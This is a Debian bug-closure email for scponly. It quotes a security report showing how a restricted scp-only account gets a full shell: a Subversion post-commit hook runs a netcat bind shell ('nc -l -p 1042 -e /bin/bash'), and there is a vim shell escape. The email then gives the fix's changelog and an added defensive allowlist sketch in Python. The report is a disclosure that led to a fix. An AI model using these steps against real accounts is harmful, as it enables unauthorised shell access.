Your message dated Mon, 28 Jan 2008 19:52:18 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#437148: fixed in scponly 4.0-1sarge2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--- Begin Message ---
Package: scponly
Version: 4.6-1
X-Debbugs-CC: [EMAIL PROTECTED]
Severity: grave
Tags: security

Hi Thomas Wana,

messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of gaining
full shell access:

I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
        ( nc -l -p 1042 -e /bin/bash) &
I copy this repository using
        scp -r /tmp/blubb/ [EMAIL PROTECTED]:
Then I check out the repository remotely:
        ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
        touch blah
        scp blah [EMAIL PROTECTED]:bla/
        ssh [EMAIL PROTECTED] /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
        :!/bin/bash
to get a shell, but having done the post-commit hook already, I want to
use that, so I write something and quit the editor with :x

At this point, I can use
        nc host 1042
and I have a shell for the account that should have none.

The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.

I have sent this information to [EMAIL PROTECTED] and scponly’s
upstream maintainer last week, but have not yet gotten a response.

Greetings,
Joachim


-- 
Joachim "nomeata" Breitner
Debian Developer
  [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata

Attachment: signature.asc
Description: This is a digitally signed message part


--- End Message ---
--- Begin Message ---
Source: scponly
Source-Version: 4.0-1sarge2

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.0-1sarge2.diff.gz
  to pool/main/s/scponly/scponly_4.0-1sarge2.diff.gz
scponly_4.0-1sarge2.dsc
  to pool/main/s/scponly/scponly_4.0-1sarge2.dsc
scponly_4.0-1sarge2_i386.deb
  to pool/main/s/scponly/scponly_4.0-1sarge2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <[EMAIL PROTECTED]> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 25 Dec 2007 13:27:52 +0100
Source: scponly
Binary: scponly
Architecture: source i386
Version: 4.0-1sarge2
Distribution: oldstable-security
Urgency: high
Maintainer: Thomas Wana <[EMAIL PROTECTED]>
Changed-By: Florian Weimer <[EMAIL PROTECTED]>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.0-1sarge2) oldstable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 f37d3236975bdb6742eba5ac788c40c2 892 utils optional scponly_4.0-1sarge2.dsc
 380ea78eb602749989c8031a4f916c79 27490 utils optional scponly_4.0-1sarge2.diff.gz
 62413a011d04721bb4b6f9a3d9496e27 29322 utils optional scponly_4.0-1sarge2_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

-----END PGP SIGNATURE-----



--- End Message ---
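
As an added illustration (not scponly's code and not part of either message above), a restricted-shell request check in the spirit of the fix: helpers that can run hooks or editors are simply absent from the allowlist, and scp's -o and -F are rejected even when clustered with other flags. The helper paths and the list of scp options that take a value are assumptions of this sketch.

```python
import shlex

# Assumed helper paths; svn, svnserve, rsync and unison are deliberately absent.
ALLOWED = {"scp": "/usr/bin/scp", "sftp-server": "/usr/lib/openssh/sftp-server"}
DENIED_SCP_OPTS = set("oF")            # named in the changelog (CVE-2007-6415)
SCP_OPTS_WITH_ARG = set("cFiloPS")     # assumption: taken from scp's usage text


def denied_scp_option(args):
    """Return the first denied scp option letter in args, or None."""
    i = 0
    while i < len(args):
        tok = args[i]
        i += 1
        if tok == "--":
            return None                # everything after "--" is an operand
        if len(tok) < 2 or tok[0] != "-":
            continue                   # operand; keep scanning, GNU getopt permutes
        for j, opt in enumerate(tok[1:], start=1):
            if opt in DENIED_SCP_OPTS:
                return opt
            if opt in SCP_OPTS_WITH_ARG:
                if j == len(tok) - 1:
                    i += 1             # value is the next token, skip it
                break                  # rest of this token is the option's value
    return None


def check_request(command):
    """Return (allowed, reason) for the command string an SSH client asked for."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return False, "unparseable command: %s" % exc
    if not argv:
        return False, "empty command"
    name = argv[0].rsplit("/", 1)[-1]
    if argv[0] not in (name, ALLOWED.get(name)) or name not in ALLOWED:
        return False, "%s is not an allowed helper" % argv[0]
    if name == "scp":
        bad = denied_scp_option(argv[1:])
        if bad:
            return False, "scp option -%s is denied" % bad
    # Caller must exec ALLOWED[name] with argv[1:] directly, never via a shell.
    return True, "ok"
```

The check fails closed: a value-taking option such as `-i Foo` is not mistaken for `-F`, while `-rF cfg` and `-oProxyCommand=...` are both refused.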